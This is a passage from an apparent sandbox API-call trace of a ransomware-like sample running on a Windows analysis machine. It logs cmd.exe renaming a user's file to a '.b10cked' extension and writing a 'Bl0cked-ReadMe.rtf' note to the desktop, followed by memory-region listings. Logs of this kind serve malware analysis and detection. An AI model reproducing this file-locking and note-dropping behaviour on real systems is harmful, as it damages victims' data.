lpLCData=0x49e24d40, cchData=32 | out: lpLCData="Tue") returned 4 [0224.503] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49e24d00, cchData=32 | out: lpLCData="Wed") returned 4 [0224.503] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49e24cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0224.503] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49e24c80, cchData=32 | out: lpLCData="Fri") returned 4 [0224.503] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49e24c40, cchData=32 | out: lpLCData="Sat") returned 4 [0224.503] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49e24c00, cchData=32 | out: lpLCData="Sun") returned 4 [0224.503] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49e24930, cchData=8 | out: lpLCData=".") returned 2 [0224.503] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49e24920, cchData=8 | out: lpLCData=",") returned 2 [0224.503] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0224.504] GetConsoleTitleW (in: lpConsoleTitle=0x2a08f8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0224.504] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0224.504] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0224.504] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0224.504] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0224.505] _wcsicmp (_String1="move", _String2=")") returned 68 [0224.505] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0224.505] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0224.505] _wcsicmp (_String1="IF", _String2="move") returned -4 [0224.505] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0224.505] _wcsicmp (_String1="REM", _String2="move") returned 5 [0224.505] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0224.513] GetConsoleTitleW (in: lpConsoleTitle=0x1ef7d0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0224.513] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0224.513] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0224.513] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0224.513] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0224.513] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0224.513] _wcsicmp (_String1="move", _String2="CD") returned 10 [0224.513] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0224.513] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0224.513] _wcsicmp (_String1="move", _String2="REN") returned -5 [0224.513] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0224.513] _wcsicmp (_String1="move", _String2="SET") returned -6 [0224.513] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0224.513] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0224.513] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0224.513] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0224.513] _wcsicmp (_String1="move", _String2="MD") returned 11 [0224.513] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0224.513] _wcsicmp (_String1="move", _String2="RD") returned -5 [0224.513] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0224.513] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0224.513] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0224.513] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0224.514] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0224.514] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0224.514] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0224.514] _wcsicmp (_String1="move", _String2="VER") returned -9 [0224.514] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0224.514] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0224.514] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0224.514] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0224.514] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0224.514] _wcsicmp (_String1="move", _String2="START") returned -6 [0224.514] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0224.514] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0224.514] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0224.515] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0224.515] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0224.515] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1ef58c, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x1ef584, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x1ef584*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0224.516] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0224.516] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0224.516] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0224.516] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0224.516] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0224.516] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0224.516] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0224.516] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0224.516] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0224.516] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0224.516] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0224.516] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0224.516] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0224.516] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0224.516] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0224.516] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0224.516] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0224.516] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0224.516] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0224.516] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0224.516] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0224.516] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0224.517] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0224.517] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0224.517] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0224.517] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0224.517] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0224.517] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0224.517] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0224.517] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0224.517] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0224.517] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0224.517] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0224.517] _wcsicmp (_String1="1UP3L~1.BMP", _String2=".") returned 3 [0224.517] _wcsicmp (_String1="1UP3L~1.BMP", _String2="..") returned 3 [0224.517] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\1UP3L~1.BMP" (normalized: "c:\\users\\eebsym5\\desktop\\gbki\\fttfht~1\\1up3l~1.bmp")) returned 0x20 [0224.517] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2b1e80 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0224.517] SetErrorMode (uMode=0x0) returned 0x0 [0224.518] SetErrorMode (uMode=0x1) returned 0x0 [0224.518] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\1UP3L~1.BMP", nBufferLength=0x104, lpBuffer=0x1eef14, lpFilePart=0x1eeefc | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\1UP3L~1.BMP", lpFilePart=0x1eeefc*="1UP3L~1.BMP") returned 0x32 [0224.518] SetErrorMode (uMode=0x0) returned 0x1 [0224.518] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1" (normalized: "c:\\users\\eebsym5\\desktop\\gbki\\fttfht~1")) returned 0x12 [0224.518] _wcsicmp (_String1="1UP3L~1.BMP", _String2=".") returned 3 [0224.518] _wcsicmp (_String1="1UP3L~1.BMP", _String2="..") returned 3 [0224.518] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\1UP3L~1.BMP" (normalized: "c:\\users\\eebsym5\\desktop\\gbki\\fttfht~1\\1up3l~1.bmp")) returned 0x20 [0224.518] SetErrorMode (uMode=0x0) returned 0x0 [0224.518] SetErrorMode (uMode=0x1) returned 0x0 [0224.518] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\1UP3L~1.BMP", nBufferLength=0x104, lpBuffer=0x1ef390, lpFilePart=0x1ef128 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\1UP3L~1.BMP", lpFilePart=0x1ef128*="1UP3L~1.BMP") returned 0x32 [0224.518] SetErrorMode (uMode=0x0) returned 0x1 [0224.518] SetErrorMode (uMode=0x0) returned 0x0 [0224.518] SetErrorMode (uMode=0x1) returned 0x0 [0224.518] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\1up3 l.bmp.b10cked", nBufferLength=0x104, lpBuffer=0x1ef598, lpFilePart=0x1ef128 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\1up3 l.bmp.b10cked", lpFilePart=0x1ef128*="1up3 l.bmp.b10cked") returned 0x39 [0224.518] SetErrorMode (uMode=0x0) returned 0x1 [0224.518] SetLastError (dwErrCode=0x0) [0224.518] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\1up3 l.bmp.b10cked" (normalized: "c:\\users\\eebsym5\\desktop\\gbki\\fttfht~1\\1up3 l.bmp.b10cked")) returned 0xffffffff [0224.518] GetLastError () returned 0x2 [0224.518] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\1UP3L~1.BMP", fInfoLevelId=0x1, lpFindFileData=0x1eeaa4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1eeaa4) returned 0x2a0ed0 [0224.519] FindNextFileW (in: hFindFile=0x2a0ed0, lpFindFileData=0x1eeaa4 | out: lpFindFileData=0x1eeaa4) returned 0 [0224.519] GetLastError () returned 0x12 [0224.519] FindClose (in: hFindFile=0x2a0ed0 | out: hFindFile=0x2a0ed0) returned 1 [0224.520] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\1UP3L~1.BMP", fInfoLevelId=0x1, lpFindFileData=0x2b1c20, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2b1c20) returned 0x2a0ed0 [0224.520] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\1up3 l.bmp.b10cked", nBufferLength=0x104, lpBuffer=0x1eed3c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\1up3 l.bmp.b10cked", lpFilePart=0x0) returned 0x39 [0224.520] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\1up3 l.bmp", nBufferLength=0x104, lpBuffer=0x1eed3c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\1up3 l.bmp", lpFilePart=0x0) returned 0x31 [0224.520] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\1up3 l.bmp" (normalized: "c:\\users\\eebsym5\\desktop\\gbki\\fttfht~1\\1up3 l.bmp")) returned 0x20 [0224.520] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\1up3 l.bmp" (normalized: "c:\\users\\eebsym5\\desktop\\gbki\\fttfht~1\\1up3 l.bmp"), lpNewFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\1up3 l.bmp.b10cked" (normalized: "c:\\users\\eebsym5\\desktop\\gbki\\fttfht~1\\1up3 l.bmp.b10cked"), dwFlags=0x3) returned 1 [0224.521] FindClose (in: hFindFile=0x2a0ed0 | out: hFindFile=0x2a0ed0) returned 1 [0224.521] _vsnwprintf (in: _Buffer=0x49e25040, _BufferCount=0x103, _Format="%9d", _ArgList=0x1eecf0 | out: _Buffer=" 1") returned 9 [0224.521] _get_osfhandle (_FileHandle=1) returned 0x7 [0224.521] GetFileType (hFile=0x7) returned 0x2 [0224.524] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0224.524] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1eec7c | out: lpMode=0x1eec7c) returned 1 [0224.524] _get_osfhandle (_FileHandle=1) returned 0x7 [0224.524] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1eecb0 | out: lpConsoleScreenBufferInfo=0x1eecb0) returned 1 [0224.525] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x49e34640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0224.525] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x49e34640, nSize=0x2000, Arguments=0x1eecf0 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0224.525] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49e34640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x1eecd4, lpReserved=0x0 | out: lpBuffer=0x49e34640*, lpNumberOfCharsWritten=0x1eecd4*=0x1a) returned 1 [0224.525] _get_osfhandle (_FileHandle=1) returned 0x7 [0224.525] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0224.525] _get_osfhandle (_FileHandle=1) returned 0x7 [0224.525] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49e241ac | out: lpMode=0x49e241ac) returned 1 [0224.525] _get_osfhandle (_FileHandle=0) returned 0x3 [0224.525] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49e241b0 | out: lpMode=0x49e241b0) returned 1 [0224.526] SetConsoleInputExeNameW () returned 0x1 [0224.526] GetConsoleOutputCP () returned 0x1b5 [0224.526] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49e24260 | out: lpCPInfo=0x49e24260) returned 1 [0224.526] SetThreadUILanguage (LangId=0x0) returned 0x409 [0224.526] exit (_Code=0) Process: id = "587" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16720" os_pid = "0x128" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\Bl0cked-ReadMe.rtf\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 33599 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 33600 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 33601 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 33602 start_va = 0x1f0000 end_va = 0x2effff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 33603 start_va = 0x49e00000 end_va = 0x49e4bfff entry_point = 0x49e00000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 33604 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 33605 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 33606 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 33607 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 33608 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 33886 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 33887 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 33888 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 33889 start_va = 0x1e0000 end_va = 0x1effff entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 33890 start_va = 0x3d0000 end_va = 0x4cffff entry_point = 0x0 region_type = private name = "private_0x00000000003d0000" filename = "" Region: id = 33891 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 33892 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 33893 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 33894 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 33895 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 33896 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 33897 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 33898 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 33899 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 33900 start_va = 0xc0000 end_va = 0x187fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 33901 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 33902 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 33903 start_va = 0x190000 end_va = 0x196fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 33904 start_va = 0x1a0000 end_va = 0x1a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 33905 start_va = 0x1b0000 end_va = 0x1b0fff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 33906 start_va = 0x1c0000 end_va = 0x1c0fff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 33907 start_va = 0x4d0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 33908 start_va = 0x5e0000 end_va = 0x11dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005e0000" filename = "" Region: id = 33909 start_va = 0x11e0000 end_va = 0x1342fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011e0000" filename = "" Thread: id = 814 os_tid = 0x12c [0225.534] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2ef844 | out: lpSystemTimeAsFileTime=0x2ef844*(dwLowDateTime=0xb9fdaec0, dwHighDateTime=0x1d440a9)) [0225.534] GetCurrentProcessId () returned 0x128 [0225.534] GetCurrentThreadId () returned 0x12c [0225.534] GetTickCount () returned 0x3e426 [0225.534] QueryPerformanceCounter (in: lpPerformanceCount=0x2ef83c | out: lpPerformanceCount=0x2ef83c*=28232351046) returned 1 [0225.535] GetModuleHandleA (lpModuleName=0x0) returned 0x49e00000 [0225.535] __set_app_type (_Type=0x1) [0225.535] __p__fmode () returned 0x76b331f4 [0225.535] __p__commode () returned 0x76b331fc [0225.535] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49e221a6) returned 0x0 [0225.535] __getmainargs (in: _Argc=0x49e24238, _Argv=0x49e24240, _Env=0x49e2423c, _DoWildCard=0, _StartInfo=0x49e24140 | out: _Argc=0x49e24238, _Argv=0x49e24240, _Env=0x49e2423c) returned 0 [0225.536] GetCurrentThreadId () returned 0x12c [0225.536] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x12c) returned 0x38 [0225.536] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0225.536] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0225.536] SetThreadUILanguage (LangId=0x0) returned 0x409 [0225.536] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0225.536] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2ef7d4 | out: phkResult=0x2ef7d4*=0x0) returned 0x2 [0225.536] VirtualQuery (in: lpAddress=0x2ef80b, lpBuffer=0x2ef7a4, dwLength=0x1c | out: lpBuffer=0x2ef7a4*(BaseAddress=0x2ef000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0225.536] VirtualQuery (in: lpAddress=0x1f0000, lpBuffer=0x2ef7a4, dwLength=0x1c | out: lpBuffer=0x2ef7a4*(BaseAddress=0x1f0000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0225.536] VirtualQuery (in: lpAddress=0x1f1000, lpBuffer=0x2ef7a4, dwLength=0x1c | out: lpBuffer=0x2ef7a4*(BaseAddress=0x1f1000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0225.536] VirtualQuery (in: lpAddress=0x1f3000, lpBuffer=0x2ef7a4, dwLength=0x1c | out: lpBuffer=0x2ef7a4*(BaseAddress=0x1f3000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0225.536] VirtualQuery (in: lpAddress=0x2f0000, lpBuffer=0x2ef7a4, dwLength=0x1c | out: lpBuffer=0x2ef7a4*(BaseAddress=0x2f0000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0xe0000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0225.536] GetConsoleOutputCP () returned 0x1b5 [0225.537] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49e24260 | out: lpCPInfo=0x49e24260) returned 1 [0225.537] SetConsoleCtrlHandler (HandlerRoutine=0x49e1e72a, Add=1) returned 1 [0225.537] _get_osfhandle (_FileHandle=1) returned 0x7 [0225.537] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0225.537] _get_osfhandle (_FileHandle=1) returned 0x7 [0225.537] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49e241ac | out: lpMode=0x49e241ac) returned 1 [0225.537] _get_osfhandle (_FileHandle=1) returned 0x7 [0225.537] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0225.537] _get_osfhandle (_FileHandle=0) returned 0x3 [0225.537] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49e241b0 | out: lpMode=0x49e241b0) returned 1 [0225.538] _get_osfhandle (_FileHandle=0) returned 0x3 [0225.538] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0225.538] GetEnvironmentStringsW () returned 0x3e0178* [0225.538] FreeEnvironmentStringsW (penv=0x3e0178) returned 1 [0225.538] GetEnvironmentStringsW () returned 0x3e0178* [0225.538] FreeEnvironmentStringsW (penv=0x3e0178) returned 1 [0225.538] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ee744 | out: phkResult=0x2ee744*=0x40) returned 0x0 [0225.538] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ee74c, lpData=0x2ee750, lpcbData=0x2ee748*=0x1000 | out: lpType=0x2ee74c*=0x0, lpData=0x2ee750*=0xa0, lpcbData=0x2ee748*=0x1000) returned 0x2 [0225.538] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ee74c, lpData=0x2ee750, lpcbData=0x2ee748*=0x1000 | out: lpType=0x2ee74c*=0x4, lpData=0x2ee750*=0x1, lpcbData=0x2ee748*=0x4) returned 0x0 [0225.538] 